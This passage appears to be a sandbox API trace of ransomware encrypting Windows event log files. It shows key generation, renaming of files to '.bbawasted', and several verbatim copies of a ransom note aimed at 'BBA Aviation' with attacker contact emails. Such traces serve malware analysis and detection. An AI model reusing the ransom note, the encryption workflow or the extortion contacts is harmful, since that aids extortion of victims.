CloseHandle (hObject=0x280) returned 1 [0198.879] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0198.879] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a5f10) returned 1 [0198.880] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0198.880] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0198.880] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6818) returned 1 [0198.881] CryptGenRandom (in: hProv=0x6a6818, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0198.881] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0198.993] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0198.994] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0198.994] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0198.994] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]RfkBuMTf39C8UmrYwrefh1yYyrjQdV0E8JQLZyeGi0Muv6C0G3Hd9YUk2L5Yf9EQ\r\nHjbRGxLDn+C5p2HTniWub/7KmTEVNkJwkNg0BVaA0BW1XSxg+1U6JQ3h/NxM2wO4\r\nuFmDXuKcozCbAMOroDdGIggCxmjNp+W10VShAMnWKNP8wwjjhNNuU5j96M5H3V63\r\nUCcCsxH/viiU8TwC0BGQrpymxcq8vqdmPy63iaLh6WDJIV8Ui6tb/LW6zf2a65N2\r\nlJlasDvy2xKDogOnQRdD7zQKCL7Um57b51gegDd6rwfiZfPrhBEPBlLJizdBhOqP\r\np0lfoq3sGYTaQ5ZX+VC3Nusi93KziIGlgd4YkKRfwWkfHFyI9872ZzOSqGJoQD0b\r\nTG8kf4oZfybbSV7uu1JH1NTEifo1LiSkm4PbKOtnEPqiL+IlovXRrUzWW0FkHy8l\r\nZ01QI5fqsBLOnd+SWf8J445AUu31Hv89Etn4JVBtrIPUJQGEkSDHr5O0QkmeoO3I\r\nI8q3Xa6W2NBKEX5JhVn8voHDqoHE4vq0PuSFaGqmgTjfda+a9o6Zz6P3UMtn3Oo2\r\nwVb3HIowL/92nFmn+OiZpqIBq42CjCCjY6ROFqOsOJI74TylX5oMPxykCbgfrLVy\r\n68KthKBA0voYK4PV7Dr0HmznyrGeCf+cMX+5vNo+qZ0=[end_key]\r\nKEEP IT\r\n") returned 984 [0198.994] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0198.994] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0198.994] SetEndOfFile (hFile=0x28c) returned 1 [0198.997] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0198.997] CloseHandle (hObject=0x28c) returned 1 [0199.000] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0199.000] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aab28 | out: hHeap=0x660000) returned 1 [0199.001] _aulldvrm () returned 0x0 [0199.001] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6bd0) returned 1 [0199.001] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0199.001] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0199.001] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx") returned 94 [0199.002] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c6) returned 0x6aecf0 [0199.002] lstrcpyW (in: lpString1=0x6aedac, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0199.002] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0199.002] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a60a8) returned 1 [0199.003] CryptGenRandom (in: hProv=0x6a60a8, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0199.003] CryptReleaseContext (hProv=0x6a60a8, dwFlags=0x0) returned 1 [0199.068] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4connectionsecurity.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0199.069] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0199.071] SetEndOfFile (hFile=0x28c) returned 1 [0199.071] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0199.071] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0199.071] lstrcpyW (in: lpString1=0x6aedac, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0199.071] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4connectionsecurity.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4connectionsecurity.evtx.bbawasted")) returned 1 [0199.073] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4connectionsecurity.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0199.073] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0199.074] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0199.074] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0199.074] CloseHandle (hObject=0x280) returned 1 [0199.081] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0199.082] CloseHandle (hObject=0x294) returned 1 [0199.082] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0199.082] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6928) returned 1 [0199.083] CryptGenRandom (in: hProv=0x6a6928, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0199.083] CryptReleaseContext (hProv=0x6a6928, dwFlags=0x0) returned 1 [0199.083] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6c58) returned 1 [0199.084] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0199.084] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0199.096] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0199.096] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0199.096] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0199.096] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]jq6rdvrju9Ca3Ycvhr/Z0bOaHwQUjxuaKteHe3S8zlVhUMhwYlP4fR2X5p7FFQcw\r\ndFucqsNr0PdtUh2B859ptbYSK1AviHuf9GNtnpy9YM4uxYIaKdzdXiAiITJB5pMx\r\nziCvlhuBkv2VtHP9+HpfDlehWMcZpuYTL3HfewCGp1MGT49pwfsfSSjiIBFdYpQg\r\nh+s9y//AJzw0dR/QCqL6SJWaiBtpUvhiF08r5i/XzsycYU0oN3SHzv29xuHAksrK\r\nHbEivZZH1YVaEPZGCA8KU1QEmIw/GZOsgcOTCUjE//ZOKOqXmR0LKTs6haYKs8Dz\r\n03CUqYAH82PD9HF9MOj5/DCo/sgzgd6izuu0gU9dOP7JhLk+jE9+zEa7hVy0L0pw\r\n8rH97vFkyZZ6uGWFg63i2ZF7VB8dUP6baZWbmjidrgI9fqevkjI/7A1n2HWwBlHy\r\nBrd2pTMFKwiZInoR8pKnMn2gkRjgvlSrxERGU571RGuLkSRmgT2UfCzf5ugOG2sI\r\nwdq9rirsJ5IrEOh8k39SZlq5KvC/VKdnNE49yBCyShV/wY3bD5iy08PawUV87LF0\r\ndFJQ/zNkp5BAjaBeiL4Yi8iTH5J3+VFg49tbLUf6mw1+TEVOpQ4GTSjwvlD8i3Jl\r\nohRShWP8DUrONJzcJ1MAM0DCjpVmrjtU8LRfi0adPRa=[end_key]\r\nKEEP IT\r\n") returned 984 [0199.097] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0199.097] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0199.097] SetEndOfFile (hFile=0x28c) returned 1 [0199.100] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0199.100] CloseHandle (hObject=0x28c) returned 1 [0199.104] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0199.104] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0088 | out: hHeap=0x660000) returned 1 [0199.105] _aulldvrm () returned 0x0 [0199.105] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6350) returned 1 [0199.105] CryptGenRandom (in: hProv=0x6a6350, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0199.106] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0199.106] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx") returned 84 [0199.106] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2b2) returned 0x6aecf0 [0199.106] lstrcpyW (in: lpString1=0x6aed98, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0199.106] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0199.106] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6460) returned 1 [0199.107] CryptGenRandom (in: hProv=0x6a6460, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0199.107] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0199.107] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4firewall.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0199.109] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0199.177] SetEndOfFile (hFile=0x28c) returned 1 [0199.177] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0199.177] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0199.177] lstrcpyW (in: lpString1=0x6aed98, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0199.177] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4firewall.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4firewall.evtx.bbawasted")) returned 1 [0199.179] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4firewall.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0199.179] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0199.179] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x101000 [0199.179] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x101000) returned 0x41a0000 [0199.180] CloseHandle (hObject=0x294) returned 1 [0199.413] UnmapViewOfFile (lpBaseAddress=0x41a0000) returned 1 [0199.427] CloseHandle (hObject=0x280) returned 1 [0199.427] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0199.427] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a5f10) returned 1 [0199.428] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0199.428] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0199.428] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a63d8) returned 1 [0199.429] CryptGenRandom (in: hProv=0x6a63d8, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0199.429] CryptReleaseContext (hProv=0x6a63d8, dwFlags=0x0) returned 1 [0199.544] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0199.545] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0199.545] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0199.545] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]k66B63NTeUyu1w6MDyKqgqY09K0lBzFG09s5LjNKHojnOYutTmgH+p4iT+0gk/rT\r\n0ST4ZGs9VHzyVrkPKOnPI/O+wsC0Zevuj6EDQyimSqb09Y9vLTMBE8d9nQnuNHui\r\nv6us2JyDO7hbqaXjpSVIQI2J8GM3jNeRYp03yp69KZvOOFhTR0Fw4PO58XQjjD7M\r\nETHA/FMI5Ln/An26y6GBA9SIbjlcod225vwVByeHBYUiKSVG3yVXmd/KK6y/kPKA\r\nN2WNYxB3kkyXPTy8ne1+YyDUWFyV3PYB7jMj+695M9BsW05W5lcMQvdeAIU7RaNG\r\nVkP0buBFrI1JXXCmx3OrUyc2/4GaIWOnbX5ot8gqXFkF8Z86sxFFp0kshccKhNhj\r\nDgNMR2iA89Ll4sF6wK5KBtir+GZmyCjGuh0jyt6dGNbuI6ATAh3LPHK+jI+dTR/4\r\n7CtlVWuSeYtY+cjzbjJxWScdR6km1QZxqpc9hcsVQ9OfJeA9sIz8KpKfeKCVZylP\r\nA4qG2urWZNFZfSkywUmtGG8iFyGlzmufMDmpX9+j2L5U1fOnBv0FsG2tlmkYvO3Q\r\nhuxVxKvAVD8zDvphPHYbaqbqRGtlXhP1dXQZizeghKH6+FYVTQpcz/b2HVTNWzGv\r\nTTkLVIdZ/RfG5nEyNRs5r773tc8jzvCdCVPupnbxwvH=[end_key]\r\nKEEP IT\r\n") returned 984 [0199.545] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0199.545] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0199.545] SetEndOfFile (hFile=0x28c) returned 1 [0199.548] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0199.548] CloseHandle (hObject=0x28c) returned 1 [0199.552] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0199.552] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a01a0 | out: hHeap=0x660000) returned 1 [0199.552] _aulldvrm () returned 0x0 [0199.552] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6708) returned 1 [0199.553] CryptGenRandom (in: hProv=0x6a6708, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0199.553] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0199.553] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx") returned 69 [0199.553] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x294) returned 0x6aecf0 [0199.553] lstrcpyW (in: lpString1=0x6aed7a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0199.553] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0199.553] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6240) returned 1 [0199.554] CryptGenRandom (in: hProv=0x6a6240, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0199.554] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0199.554] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-wininet-config%4proxyconfigchanged.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0199.555] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0199.556] SetEndOfFile (hFile=0x28c) returned 1 [0199.556] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0199.556] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0199.556] lstrcpyW (in: lpString1=0x6aed7a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0199.556] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx" (normalized: "c:\\logs\\microsoft-windows-wininet-config%4proxyconfigchanged.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-wininet-config%4proxyconfigchanged.evtx.bbawasted")) returned 1 [0199.557] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-wininet-config%4proxyconfigchanged.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0199.557] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0199.558] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0199.558] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0199.558] CloseHandle (hObject=0x280) returned 1 [0199.563] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0199.563] CloseHandle (hObject=0x294) returned 1 [0199.563] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0199.563] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a62c8) returned 1 [0199.564] CryptGenRandom (in: hProv=0x6a62c8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0199.564] CryptReleaseContext (hProv=0x6a62c8, dwFlags=0x0) returned 1 [0199.564] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6790) returned 1 [0199.565] CryptGenRandom (in: hProv=0x6a6790, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0199.565] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0199.573] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0199.574] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0199.574] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0199.574] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING 